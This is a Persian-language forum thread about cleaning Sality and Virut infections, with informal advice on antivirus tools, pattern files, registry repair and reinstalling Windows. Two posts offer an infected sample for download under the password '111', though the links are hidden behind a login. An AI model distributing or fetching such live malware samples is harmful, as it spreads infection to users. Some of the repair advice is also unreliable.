بخدا بچه زدن نداره.:42:
بهر حال ما دوستون داریم:11:

شرمنده خیلی عصبانی بودم...ببخشید

سلام
فايل ويروسي شده رو آپلود كردم

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass : 111
لطفا راهي رو واسه clean كردنش بگيد
ممنون.

دوست عزيز كسپرسكي 8 خيلي راحت تونست فايل رو از Keygen جدا كنه و پاكش كنه در ضمن اسم ويروسم virus.win32.virut.ce هست .
براي دوستاني كه سايت فيل+تره ميتونن از لينك زير اين ويروسو دان كنن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass: 111

از آقای pacher خواهش میکنم لینکی که به نظرشون واسه پاک کردن این ویروس خوبه رو بذارن

من کاسپر آنتی ویروس 8 رو نصب کردم فایل ارایرو میپاکه لطفا کنید

اینطور که وبگردی کردم ویروس win32.sality خیلی جونوره آخرش باید فایل اجرایی رو پاک کنی!!! کسی راه حلی نرم افزاری سراغ نداره؟!

اینطور که وبگردی کردم ویروس win32.sality خیلی جونوره آخرش باید فایل اجرایی رو پاک کنی!!! کسی راه حلی نرم افزاری سراغ نداره؟!
سلام امیدوارم خسته نشده باشی.
رفیق مگه راه حل تو پست 1 کمکت نکرد؟

سلام جناب pitcher
لطفا لينك pattern جديد رو بزارين
دم شما گرم :10:

سلام جناب pitcher
لطفا لينك pattern جديد رو بزارين
دم شما گرم :10:
سلام
لینکه کار میکنه!
اینم لینکه دون کردن Pattern با تاریخ به روز رسانیه Mar 22, 2009(دو روز پیش)

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق و پیروز باشید.

ساليتي رو پاك كردم
ولي حالا يه مشكلي هست و اونم اينه كه وقتي روي درايو ها در my computer دو بار كليك ميكنم باز نميشه و error ميده :
\:E
access is denied

لطفا بهم بگين چطور اين مشكل رو حل كنم
مرسي :11::40:

ساليتي رو پاك كردم
ولي حالا يه مشكلي هست و اونم اينه كه وقتي روي درايو ها در my computer دو بار كليك ميكنم باز نميشه و error ميده :
\:E
access is denied
لطفا بهم بگين چطور اين مشكل رو حل كنم
مرسي :11::40:
سلام

در مسیر زیر به این موضوع پرداخته شده.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.:31:

من براي از بين بردن اين ويروس nod32 ورژن 4 رو نصب كردم.ويروسو از بين برد.ولي بعد از اون تقريبا تمام فايلاي ينكي از درايوامو نشون نميده.روي properties درايو زدم.اون فايلا delete نشدن ولي نميدونم چرا نشونشون نميده.اكثرشون عكس بودن .ولي درايو ديگم سالمه.
چكار بايد بكنم؟؟؟؟!!!:sad:

سلام
عزیز شما نمیبایست از NOD استفاده می کردی!!
ویروسه به فایلهای سیستمیت هم چسبیده بوده که اونا رو هم داغون کردی!
پیشنهادم اینه که با دستوره sfc /scannow دوباره فایلهای سیستمیت رو کپی کنی. یه RegRepair هم بزن.
موفق و پیروز باشید.

مرسی،آخه نمی دونستم اینقدر ویروس افتضاحیه که همچین کاری بکنه!
من بعدش ویندوزو دوباره نصب کردم ،اشکالی ایجاد نمی کنه؟

راستی چرا فقط فایلای این درایومو نشون نمی ده؟ درایو ویندوزم نیست.
ولی فایلای درایو دیگه که موزیکه رو نشون می ده.

سلام-آقای picher ضمن تشکر نمیشه از همون اول آنتی ویروس trend micro رو نصب و آپدیت کنیم ؟قاعدتا فرقی نباید بکنه ؟

با سلام و خسته نباشید
سیستم ما :
1- آیکون های دسکتاپش ناپدید می شوند
2- آهنگها را باز نمی کند
3- taske manager فعال نیست
4- هیچ نرم افزاری نصب نمی شود
5- فایلهای exe هم اجر ا نمی شود
6- ویندوز را پاک کرده و دوباره نصب کرده و قبل از باز کردن هر درایو و فایلی ، نرم افزار آنتی ویروس را آپدیت کرده اما باز هم درست نشده
اما باز هم این ویروس وجود دارد آیا کسی است که کمک کند ؟

ضمناً وقتی که تیک show hidden file رو هم می زنیم ، فایلهایی که hidden نبودن هم ناپدید می شوند.

نمیشه از همون اول آنتی ویروس trend micro رو نصب و آپدیت کنیم ؟قاعدتا فرقی نباید بکنه ؟

سلام
بچه ها این روش ماله وقتی که ویروس به شما اجازه نصبه آنتی ویروس نمیده و حتی آنتی شما رو هم از کار انداخته!
اگه بتونید آنتی بنصبید که دیگه خیلی عالیه!:31:


ضمناً وقتی که تیک show hidden file رو هم می زنیم ، فایلهایی که hidden نبودن هم ناپدید می شوند.
مثله اینکه شما تنها این ویروس رو ندارید! همیشه گفتیم اول نصبه آنتیه لاگه نتونستید بنصبید بعد این روش رو برید.
شما بعد از جستجو با یه آنتی ویروس حتما یه regrepair بزنید.

موفق و پیروز باشید.

سلام من سیستمم ویروس گرفته و اجازه نصب هیچ کدام از انتی ویروس های معروف رو نمیده ادرس اینجا رو بهم دادن

حالا من باید کدام انتی ویروس را دان کنم و نحوه کار ان چطور است؟؟؟

سلام من سیستمم ویروس گرفته و اجازه نصب هیچ کدام از انتی ویروس های معروف رو نمیده ادرس اینجا رو بهم دادن
حالا من باید کدام انتی ویروس را دان کنم و نحوه کار ان چطور است؟؟؟
سلام رفیق.
خداییش اولین کسی هستی که این سوالو پرسید!
مگه واضح نیست؟!!!

سلام پیچر جان
یک مشکل اساسی دارم

ببین وقتی میزنم درایو ها رو اسکن میکنه به صورت Command Prompt پیغام هایی مبنی بر اینکه ویروس رو شناخته میاد و من اوکی رو میزنم و بعد از پایان اسکن نیز ریستارت میکنم اما دوباره که اسکن میکنم بازم اون ویروس ها رو میشناسه و پیغام رو میده
اسم ویروس نیز این است
TSC-GENCLEAN
حالا باید چکار کنم

سلام این یک ویروس رو نیز اضافه کرده

deadlink-novirus
حالا چکار باید بکنم بازم اجازه نصب انتی ویروس رو ندارم

اگر من سیستم رو f disk کنم کارم حل میشود
چکار کنم از دست این برنامه راحت بشم

سلام پیچر جان
یک مشکل اساسی دارم
ببین وقتی میزنم درایو ها رو اسکن میکنه به صورت Command Prompt پیغام هایی مبنی بر اینکه ویروس رو شناخته میاد و من اوکی رو میزنم و بعد از پایان اسکن نیز ریستارت میکنم اما دوباره که اسکن میکنم بازم اون ویروس ها رو میشناسه و پیغام رو میده
اسم ویروس نیز این است
TSC-GENCLEAN
حالا باید چکار کنم

سلام
ببین TSC-GENCLEAN اسم ویورس نیست! وقتی این برنامه با یه Spyware,.., TrojanHorese مواجه میشه این پیغام رو میده!شما تو اون صفحه DOS اسم ویروسه تون رو میتونید ببیینید. و از روی اون میتونیم یه آنتیه خوب بهتون معرفی کنیم.

deadlink-novirus
این ویروس نیست!

بعد از پایان اسکن نیز ریستارت میکنم اما دوباره که اسکن میکنم بازم اون ویروس ها رو میشناسه و پیغام رو میده
این میتونه ویورس ها رو براتون پیدا کنه و تاجایی که ممکنه از تو حافظه برداره! اما نمیتونه اونا رو از تو satrtup برداره! دلیلش هم همینه که موقع reset شدن دوباره اونا از تو Satrtup اجرا میشن.
برنامه rootkit unhooker و Process monitor رو دون کن .از قسمت پروسزهای Rootkite عکس بزار.و عکسه Process Monitor رو هم بزار.
بروبه Run->Msconfig->Startup و عکس اونا رو هم بزار.
منتظرم.
موفق و پیروز باشید.:31:

سلام
ببین tsc-genclean اسم ویورس نیست! وقتی این برنامه با یه spyware,.., trojanhorese مواجه میشه این پیغام رو میده!شما تو اون صفحه dos اسم ویروسه تون رو میتونید ببیینید. و از روی اون میتونیم یه آنتیه خوب بهتون معرفی کنیم.

این ویروس نیست!

این میتونه ویورس ها رو براتون پیدا کنه و تاجایی که ممکنه از تو حافظه برداره! اما نمیتونه اونا رو از تو satrtup برداره! دلیلش هم همینه که موقع reset شدن دوباره اونا از تو satrtup اجرا میشن.
برنامه rootkit unhooker و process monitor رو دون کن .از قسمت پروسزهای rootkite عکس بزار.و عکسه process monitor رو هم بزار.
بروبه run->msconfig->startup و عکس اونا رو هم بزار.
منتظرم.
موفق و پیروز باشید.:31:
ممنونت هستم دوست من

این نرم افزار هایی که میگی رو از کجا دان کنم و البته کدوم ورژن رو

cسلام
ProcessMonitor از مسیر زیر

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
RootKit Unhooker هم از مسیر زیر

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشید.

سلام
من نرم افزار ها را دانلود کردم و به دستگاه مربوطه انتقال دادم اما نرم افزار مانیتور پروسس اجرا نمیشود یعنی ویروس اجازه نمی دهد
اما اون نرم افزار را تونستم باز کنم و اطلاعات مربوط رو دانلود کردم عکس هایی که مربوط هست رو گذاشتم در فایل زیر
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
یک توضیح در رابطه با عکس ها
وقتی فایل رو باز میکنی 2 عدد عکس هستند زمانی که من انتی ویروس رو میخوام نصب کنم این ارور ها رو میده

فایل SOFT در رابطه با خود نرم افزاری ایست که در پست اول معرفی کرده اید و من از پروسه کار اون عکس گرفتم ابتدا یک ارور سپس نرم افزار سپس اسکن که ویروس اتوران را می شناسه و سپس بعد از اوکی هم می شود با موفقیت پاک شده

3 فایل دیگر نیز مربوطه به همین نرم افزار جدیدی که تونستم اجراش کنم و عکس هاش رو گذاشتم

سلام
من نرم افزار ها را دانلود کردم و به دستگاه مربوطه انتقال دادم اما نرم افزار مانیتور پروسس اجرا نمیشود یعنی ویروس اجازه نمی دهد
اما اون نرم افزار را تونستم باز کنم و اطلاعات مربوط رو دانلود کردم عکس هایی که مربوط هست رو گذاشتم در فایل زیر
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
یک توضیح در رابطه با عکس ها
وقتی فایل رو باز میکنی 2 عدد عکس هستند زمانی که من انتی ویروس رو میخوام نصب کنم این ارور ها رو میده
فایل SOFT در رابطه با خود نرم افزاری ایست که در پست اول معرفی کرده اید و من از پروسه کار اون عکس گرفتم ابتدا یک ارور سپس نرم افزار سپس اسکن که ویروس اتوران را می شناسه و سپس بعد از اوکی هم می شود با موفقیت پاک شده
3 فایل دیگر نیز مربوطه به همین نرم افزار جدیدی که تونستم اجراش کنم و عکس هاش رو گذاشتم

سلام رفیق.
شما ویروستون Kazme_gheyze (با توجه به پروسز Service و درایوره hideProc.sys)
اینم انتیش:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
MD5: EC98BF9D21E10F1A64BC59CE05AF2041
موفق و پیروز باشید.

سلام رفیق.
شما ویروستون Kazme_gheyze (با توجه به پروسز Service و درایوره hideProc.sys)
اینم انتیش:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
MD5: EC98BF9D21E10F1A64BC59CE05AF2041
موفق و پیروز باشید.
سلام دستت درد نکنه من قبلا نمیتونستم بعضی از نرم افزار ها را نصب کنم اما اینبار تونستم
اما
اما مشکل نصب انتی ویروس هنوز پا بر جاست
این هم عکسش
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چکار کنم برای نصب انتی ویروس؟؟؟؟؟؟؟؟؟؟؟؟

سلام دستت درد نکنه من قبلا نمیتونستم بعضی از نرم افزار ها را نصب کنم اما اینبار تونستم
اما
اما مشکل نصب انتی ویروس هنوز پا بر جاست
این هم عکسش
چکار کنم برای نصب انتی ویروس؟؟؟؟؟؟؟؟؟؟؟؟

سلام
ببين ويروست كه kazme gheyz بود.
الان هنوز TrendMicro نميتوني بنصبي؟

سلام
ببين ويروست كه kazme gheyz بود.
الان هنوز TrendMicro نميتوني بنصبي؟

سلام این ارور رو میده ایا مشکلی داره؟
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با اجازه آقا picher دوست عزیز -
علتش این هست pattern مربوط به Spyware رو دانلود نکردی میتونی از مسیر زیر دانلود کنی و لذت ببری
این هم آدرس :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
----------------------------------------------------------------------------------------------------
-
picher جان این لینک زیر رو هم که pattern های مربوطه هست رو اگه بگذاری تو صفحه اول تو پستات دیگه صفحه اول همه رو حاجت روا میکنه-

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ممنونم دوستان عزیز نیاز به پترن نبود حلش کردم و انتی ویروس رو به نصبیدم
اما مشکل من فقط اپدیتش است؟که نمیشه؟

دوست عزیز اون عکس که گذاشتی نیازمند patern بود که اگه میخواهید AntiSpyware کار کند نیازمندش هست چون من هم این مشکل رو داشتم و با لینکی که بهت دادم حل شد لینک Patern جناب پیچر همPatern های آنتی ویروس هست حالا اگه حلش کردی چه بهتر:31: -برای آپدیت هم شما باید آخرین Pattern هارو از سایت دانلود کنی ورژن می خوره و حجم هر کدوم هم فرق میکنه

اگه نویسنده ی ویروس سالیتی را گیر بیارم حتما می کشمش
یکی به من کمک کنه من تازه اومدم توی این سایت
ببینید من salitty - off را نصب کردم بعدش با کسپر همه ی فایل هام را disinfect کردم تا این کارها را می کنم با برنامه ی regrepair رجیستری را درست می کنم تا مادامی که توی ویندوز هستم این ویروس غیر فعاله ولی تا ریست می کنم سیستم که بالا میاد آنتی ویروس از کار میافته و ویروس دوباره فعال میشه در ضمن rmsality هم تست کردم ولی جواب نداد
یه سوال دیگه هم دارم pattern یعنی چی ؟
از همه ی اونهایی که کمکم کنند صمیمانه تشکر می کنم

جدیدا بر روی بعضی از کامپیوتر دوستان نوار های زرد رنگی بر روی صفحه دسکتاپ میاد نحوه حل کردن و پاک کردن اونها چطور است؟

جدیدا بر روی بعضی از کامپیوتر دوستان نوار های زرد رنگی بر روی صفحه دسکتاپ میاد نحوه حل کردن و پاک کردن اونها چطور است؟

سلام این ویروسه saldoste!
برو به

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیداینجا تاپیکه Salitye ها!
موفق باشید.

دوست عزیز سلام
من lptnumber رو دانلود کردم ولی موقع extera به ارور برخورد میکنم

! C:\sysclean\lpt961.zip: CRC failed in lpt$---.961. The file is corrupt
دلیلش چیه ؟
و اگر برنامه micro ternd و از بازار خریداری کنم باز به فایلهایی که گفته اید احتیاج هست درسته ؟؟
منتظر جوابتون هستم

دوست عزیز سلام
من lptnumber رو دانلود کردم ولی موقع extera به ارور برخورد میکنم

! C:\sysclean\lpt961.zip: CRC failed in lpt$---.961. The file is corrupt
دلیلش چیه ؟
و اگر برنامه micro ternd و از بازار خریداری کنم باز به فایلهایی که گفته اید احتیاج هست درسته ؟؟
منتظر جوابتون هستم

سلام رفیق.
عزیز این error ماله وقتیه که فایله zipه شما خراب باشه.
دوباره دون لودش کن.
ببین اگر میتونی که آنتی بنصبی دلیل نداره از این روش استفاده کنی ها!!
ره میشه.
بازم بستگی داره شما چی بگیرید.
من پیشنهاد میدم Avira بنصبی.
موفق باشید.:31:

15 مگ بوده نصب شد و سرچ هم میکنه نمیدونم کامپیوتر مشکلش حل شده یا نه آخه موفع اجرای sysclean پیغام
required file "lpt$---.*" is missing رو میده ولی برنامه trend micro اجرا میشه و scan هم میکنه
با این اوضاع مشکل سیستم بنده حل یده است یا حتما فایل رو باید دوباره باید دانلود کنم اگر دانلود باید بشه پس لینک سالم واسه دانلود رو لطف کنید بزارید
در مورد برنامه avira هم یه توضیح بدیت ممنونن میشم زود جواب منو بدیت چون چندین روز هست که کامیوترم به این ویروس لعنتی دچر شده
منتشکرم از پاسح گویی شما
منتظر هستم

سیستم ما هنوز مشکلش حل نشد چون آنتی ویروس روش نصب نمیشه

15 مگ بوده نصب شد و سرچ هم میکنه نمیدونم کامپیوتر مشکلش حل شده یا نه آخه موفع اجرای sysclean پیغام
required file "lpt$---.*" is missing رو میده ولی برنامه trend micro اجرا میشه و scan هم میکنه
با این اوضاع مشکل سیستم بنده حل یده است یا حتما فایل رو باید دوباره باید دانلود کنم اگر دانلود باید بشه پس لینک سالم واسه دانلود رو لطف کنید بزارید
در مورد برنامه avira هم یه توضیح بدیت ممنونن میشم زود جواب منو بدیت چون چندین روز هست که کامیوترم به این ویروس لعنتی دچر شده
منتشکرم از پاسح گویی شما
منتظر هستم

سلام رفیق
پس این جور که معلومه شما اون فایله اصلیه آنتی ویروس (Pattern File)ش رو و پوشه ای که در پست 1 ذکر کردم نذاشتید!! یعنی مهمترین کار رو نکردید رفیق!!:41:
پس لطفا دوباره راه حل ارایه شده در پست 1 رو بخون.
من منتظرم.
موفق و پیروز باشید.:31::40:

دوست عزیز بنده همه فایلهای رو دانلود کردم ولی دانلود اصلی که در مسیر زیر قرار داره
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
و فایل lpt971.zip هست و 15 مگ حجم داره رو دانلود کردم ولی زمان extera کردن مشکل داره
میشه منو راهنمایی کنید آخه دوباره دانلود کردن این بی فایده است چون انگار این فایل مشکل داره و extera نمشیه میشه راهنمایی کنید
فعلا به این مشکل برخورد کردم

دوست عزیز بنده همه فایلهای رو دانلود کردم ولی دانلود اصلی که در مسیر زیر قرار داره
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
و فایل lpt971.zip هست و 15 مگ حجم داره رو دانلود کردم ولی زمان extera کردن مشکل داره
میشه منو راهنمایی کنید آخه دوباره دانلود کردن این بی فایده است چون انگار این فایل مشکل داره و extera نمشیه میشه راهنمایی کنید
فعلا به این مشکل برخورد کردم

سلام کاکو.
ببین رفیق امروز نگارش 973 رو به جای 971 رو گذاشتن.
شما سعی کن با Flashget یا هر نرم افزاره مدیریت دونلود دیگری اون رو داونلود کنی.
موفق بشاید.

سلام کاکو.
ببین رفیق امروز نگارش 973 رو به جای 971 رو گذاشتن.
شما سعی کن با Flashget یا هر نرم افزاره مدیریت دونلود دیگری اون رو داونلود کنی.
موفق بشاید.

سلام کاکو
کاکو جان بازم همون مشکل رو داره این فایل هم موقع extera کردن پیغام خطا میده باید چیکم ؟
منتظر راهنمایی هاتون هستم

سلام کاکو
کاکو جان بازم همون مشکل رو داره این فایل هم موقع extera کردن پیغام خطا میده باید چیکم ؟
منتظر راهنمایی هاتون هستم
سلام
ببین کاکو اگه تمام کارایی رو که گفتمو انجام دادی پس مشکل از Winrarه!!
لطفا یه winrarه دیگه بنصب.
موفق بهی:31:

سلام
ببین کاکو اگه تمام کارایی رو که گفتمو انجام دادی پس مشکل از Winrarه!!
لطفا یه winrarه دیگه بنصب.
موفق بهی:31:
نه کاکو جان اگه winrar اشکال داشت بایستی بقیه فایلهای زیپ رو هم آنزیپ نکنه ولی این کارو انجام میده ولی این فایل رو دوباره تا حالا دانلود کردم ولی موقع آنزیپ کردن ÷یغام میده که این فایل خراب می باشد
نمیدونم یگه باید چیکار کنم

:46:سلام
من فلش مموریم از یه کامپیوتر دیگه این ویروس رو گرفته کاسپر اسکای هم دارم اما نمیتونه پاکش کنه فقط میشناسدش
در ضمن فرمت هم نمیشه کسی هست که به من کمک کنه
منتظرتون هستم
یا هو
التماس دعا
win32\sality .aa

فکر مي کنم راه زير کمکتون کنه :
1- تمام اطلاعات مهمي که در درايو ويندوز يا Desktop يا My document داريد به يک درايو ديگر انتقال دهيد.
1- درايوي که ويندوز در آن نصب است را فرمت کنيد. (قبل از نصب ويندوز جديد ، پس از اينکه سيستم با cd ، بوت شد ، مي توانيد در محيطي که مانند DOS است و قبل از نصب ويندوز بالا مي آيد ، عمل فرمت کردن درايو ويندوز (مثلاً‌ C يا D را انجام دهيد.
2- سپس ويندوز را نصب کرده
هيچ فايل را فولدري را باز نکنيد.
3- پس از نصب مودم
4- جديدترين ورژن آنتي ويروس ، Node 32 را نصب کرده و update کنيد
5- تا قبل از يافتن ويروس توسط آنتي ويروس ،‌ هيچ برنامه اي را با نکنيد.

شاید کسپر آپدیت نیست .
چون من هم کسپر دارم این ویروس رو می‌شناسه

فکر مي کنم راه زير کمکتون کنه :
1- تمام اطلاعات مهمي که در درايو ويندوز يا desktop يا my document داريد به يک درايو ديگر انتقال دهيد.
1- درايوي که ويندوز در آن نصب است را فرمت کنيد. (قبل از نصب ويندوز جديد ، پس از اينکه سيستم با cd ، بوت شد ، مي توانيد در محيطي که مانند dos است و قبل از نصب ويندوز بالا مي آيد ، عمل فرمت کردن درايو ويندوز (مثلاً‌ c يا d را انجام دهيد.
2- سپس ويندوز را نصب کرده
هيچ فايل را فولدري را باز نکنيد.
3- پس از نصب مودم
4- جديدترين ورژن آنتي ويروس ، node 32 را نصب کرده و update کنيد
5- تا قبل از يافتن ويروس توسط آنتي ويروس ،‌ هيچ برنامه اي را با نکنيد.

سلام
لطفا برای اینکه ویندوزتون پاک نکنید از پست 1 استفاده کنید.
موفق باشید.:31::11:

راحت تر از همه پاک کردن ویندوزه

راحت تر از همه پاک کردن ویندوزه

سلام

اگه کسی برنامه های خیلی زیاد و مهم و به روز شده ای روی ویندوزش داشته باشه ؛ بازم پیشنهاد میدید پاکش کنه؟

لطفا این پیشنهاد رو هیچ جا ندید زیرا بروبچه ها میان اینجا تا ویندوزشون رو عوض نکنن.

اگه می خواستن ویندوزشون رو عوض کرد 100 تا پست تو این تاپیک نمیزاشتن:46:

موفق باشید.

سلام. من win32/virut.nbp گرفتم. کمک می کنبد پاکش کنم ؟! بیچارم کرده.

سلام. من win32/virut.nbp گرفتم. کمک می کنبد پاکش کنم ؟! بیچارم کرده.

سلام
برو به
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
پست شماره 2
به زودی یه تاپیک در موردش میزنم.
امیدوارم تا اون موقع کارت رو راه بندازه.
موفق باشید.

قبلا سرچ کردم و تاپیک شما رو خوندم ولی به نتیجه نرسیدم.
خواهش می کنم زودتر کمک کنید. اسم ویروسه هم Win32/Viru.NBP هست که آخرش P هست نه K
در ضمن شما خیلی پیچیده صحبت کرده بودید که من هیچی نفهمیدم.
اگر هم ممکنه خلاصه تر بفرمایید ممنون.

ببین رفیق تو پسته 2 شما آنتیه Symantec رو هم تست کردید؟
یادتون باشه برای آنتیه symantec باید از safemode بالا بیایید.
ببین رفیق اینجور که trendMicro میگه مثله سالیتی سگ جون نیست و خیلی رحت پاک کیشه.
یه سوال مگه انتی نمیتونی بنصبی؟
قول میدم به زودی یه تاپیک بزنم.

بالاخره بعد از 10 روز با کاسپر تونستم پاکش کنم. مرسی از شما که راهنمایی کردید . اون پست دو رو راستش نفهمیدم ولی فعلا که کاسپر جواب داد.

سلام

اگه کسی برنامه های خیلی زیاد و مهم و به روز شده ای روی ویندوزش داشته باشه ؛ بازم پیشنهاد میدید پاکش کنه؟

لطفا این پیشنهاد رو هیچ جا ندید زیرا بروبچه ها میان اینجا تا ویندوزشون رو عوض نکنن.

اگه می خواستن ویندوزشون رو عوض کرد 100 تا پست تو این تاپیک نمیزاشتن:46:

موفق باشید.

حق با شماست . معذرت می خوام:11:

قربانت عزیز:40:
تو بانک ما (که ازش ن...دارم) این ویروس غوغا کرده!
خصوصا وقتی خودش رو به یه ویروس دیگه مثل کظم غیض و ... می چسبونه و همراه اونا تکثیر میشه.
آخه جالب بود خیلیا این ویروس رو گرفتن خودش نمی دونن اونوقت می رن یه جای اشتباه سوالو مطرح می کنن و چون همه چی رو نمی تونن قشنگ توضیح بدن بچه ها هم گمراه میشن و جواب اشتباه و ....:41:

این تاپیک به چه کسانی می تواند کمک کند، کسانی که:
1- هیچ گونه انتی ویروسی نمی توانند نصب کنن.
2- حجم exe های سیستمشان 56 کیلو اضافه شده است.
3- پروسز های NptePad , Cmd , TelNet , Write , RegEdt32 پشت صحنه به صورت راندوم در حال اجرا می یاشند.
4- کلیدی مثل HKCU\Software\MSH914 در رجیستریشان ایجاد شده که MSH نام کاربر فعلی ویندوز می باشد.
5- سایت کسپر و نودشون و بقیه انتی ها شون بلوکه شده.
6- و مواردی که اقای مهندس الیاسی در ادرس

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
ذکر نمودند.
موفق و پیروز باشید.:31:

ویروس یابهای Nod - Avast در دو ماه قبل این ویروس را شناسایی و پاک می کردند. ولی این ویروس می تونه بسیار خطرناک تر از اونی که تو تاپیک گفته باشه. از جمله که روی پارتیشن های HFS که mapdrive هستند نیز فعال میشه..

از دیروز تاحالا سیستم های اداری دچار ویروسی ترکیبی شده اند که پس از تست با کلی آنتی ویروس و حتی مراجعه به سایت مایکروسافت به نتیجه رسیدم که نوع تغییر یافته سالیتی است که موارد زیر رو در سیستم ایجاد می کنه:
1- اگر به صورت آنلاین در شبکه باشید تونلی جهت انتقال ویروسی که SvcHost رو تغییر می ده فعال و آنتی ویروس پس از آلوده شدن سیستم آن رو تشخیص می ده.
2- فایروال ویندوز رو از کار می اندازه و دسترسی به آن را محدود می کنه.
3- از طریق شبکه به راحتی انتقال پیدا می کنه فقط کافی که از map drive و sharing ایتفاده کرده باشید.
4- سیستم عامل ناول رو هم می تونه آلوده کنه..
5- چون با اجرای فایلها خود رو در Tmp های ویندوز می اندازه و بعد از همونجا تمام برنامه های مقیم در حافظه رو آلوده می کنه به سرعت در سیستم پخش می شه.
6-به راحتی شبکه های ناول یا ویندوز را از کار می اندازد.
اگه کسی راه حل فوری برای اون داره حتما بگه. نصب دوباره ویندوز هیچ فایده ای نداره مگر اینکه تمام اطلاعات قابل باز شدن در ویندوز (از فایل اجرایی گرفته تا xml,...) را پاک کنید.

از دیروز تاحالا سیستم های اداری دچار ویروسی ترکیبی شده اند که پس از تست با کلی آنتی ویروس و حتی مراجعه به سایت مایکروسافت به نتیجه رسیدم که نوع تغییر یافته سالیتی است که موارد زیر رو در سیستم ایجاد می کنه:
1- اگر به صورت آنلاین در شبکه باشید تونلی جهت انتقال ویروسی که SvcHost رو تغییر می ده فعال و آنتی ویروس پس از آلوده شدن سیستم آن رو تشخیص می ده.
2- فایروال ویندوز رو از کار می اندازه و دسترسی به آن را محدود می کنه.
3- از طریق شبکه به راحتی انتقال پیدا می کنه فقط کافی که از map drive و sharing ایتفاده کرده باشید.
4- سیستم عامل ناول رو هم می تونه آلوده کنه..
5- چون با اجرای فایلها خود رو در Tmp های ویندوز می اندازه و بعد از همونجا تمام برنامه های مقیم در حافظه رو آلوده می کنه به سرعت در سیستم پخش می شه.
6-به راحتی شبکه های ناول یا ویندوز را از کار می اندازد.
اگه کسی راه حل فوری برای اون داره حتما بگه. نصب دوباره ویندوز هیچ فایده ای نداره مگر اینکه تمام اطلاعات قابل باز شدن در ویندوز (از فایل اجرایی گرفته تا xml,...) را پاک کنید.

سلام
ممنون دوست عزیز که بررسی کردیدو نتایجه کارتون رو گذاشتید.
من که فکر میکنم ویروسه سالیتی خودش رو به یه ویروسه دیگه چسبونده (Append کرده) بعد همراه کسترشه اون ویروس گسترش پیدا میکنه.
من هم همین مشکل رو داشتم با hakaglan !
سالیتی خودش رو به هاکاگلان که یه کرمه چسبونده بود و همراهه اون تمامه شبکه ما رو آلوده کرد.
پیشنهاد میدم دنباله اون ویروسه اول بگردید!
موفق باشید.:31:

دوست عزیز مایکروسافت هیچ راه حلی رو نگفته بود اسمش رو هم نگفته بود ؟ویروسی که میگی با چه نامی شناخته میشه ؟آنتی ویروس ها اصلا شناساییش میکنند و با چه نامی ؟virut ها هم کارهای مشابه سالیتی انجام میدن- شما با آخرین Pattern سیستم رو اسکن کردی ؟(تو Safe mod) اگه شبکه هستین از سرور مطمِئن شروع کنید ضمن اینکه قبلش سیستم هارو از شبکه خارج کنید تک تک نیز جداگانه سیستم هارو چک کنید تحت شبکه نباشند در آخر پیشنهاد میدم در اورژانس مطرح کنید

با اجازه آقا picher دوست عزیز -
علتش این هست pattern مربوط به Spyware رو دانلود نکردی میتونی از مسیر زیر دانلود کنی و لذت ببری
این هم آدرس :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


من این فایل را دان کردم . کجا باید کپیش کرد؟

یه سوال از آقای picher داشتم:
من کامپیوتر رو با Trend Micro اسکن کردم یه ویروس میشناسه به نام Mal_Otorun2 و خودش میگه که clean کرده ولی بعد از تموم شدن اسکن باز هم پیداش میکنه !!؟؟!
با چی بکشمش؟

یه سوال از آقای picher داشتم:
من کامپیوتر رو با Trend Micro اسکن کردم یه ویروس میشناسه به نام Mal_Otorun2 و خودش میگه که clean کرده ولی بعد از تموم شدن اسکن باز هم پیداش میکنه !!؟؟!
با چی بکشمش؟

سلام

دلیل اینه که ویروس تو حافظه است.

بعضی وقتا انتی ها نمیتونن ویروس ها رو از تو حافظه بیرون بندازن.

اگر از روش گفته شده در پست یک استافده میکنید سیستم رو بعد از scan ریست کنید و دوباره جستجو رو انجام دهید.

در اینجور مواقع اگر براتون امکان داره از کسپر استافده کنید.

یه مورده دیگه وقتی به شما tren Micro این پیام رو میده شما میتونید با بریدی به مسیری که میگه ویروس

اونجاست و ویروس رو با unlocker یا یه سیستم عامل لایو از بین ببیرید.

موفق باشید.

راستی آقای picher اون فایل pattern رو تو کدوم پوشه tren micro بزارم؟

راستی آقای picher اون فایل pattern رو تو کدوم پوشه tren micro بزارم؟
سلام

هر دوشون رو در مسیره زیر باید کپی کنید.

\SysClean_PE_SALITY\system

موفق باشید.

چون دوستان گفتند هر چه از این ویروس دیدین در اینجا مطرح کنید من هم دیده هامو میگم
تسک منیجر رو غیرفعال میکنه .
رجیستری رو غیرفعال میکنه .
شو هایدن فایل رو غیر فعال میکنه
نمیذاره با سیف مد بیای بالا
exe ها رو خراب میکنه و اگه exe آلوده رو اجرا کنی باز هم ویروسه اجرا میشه .
آواست این فایل رو میشناسه :
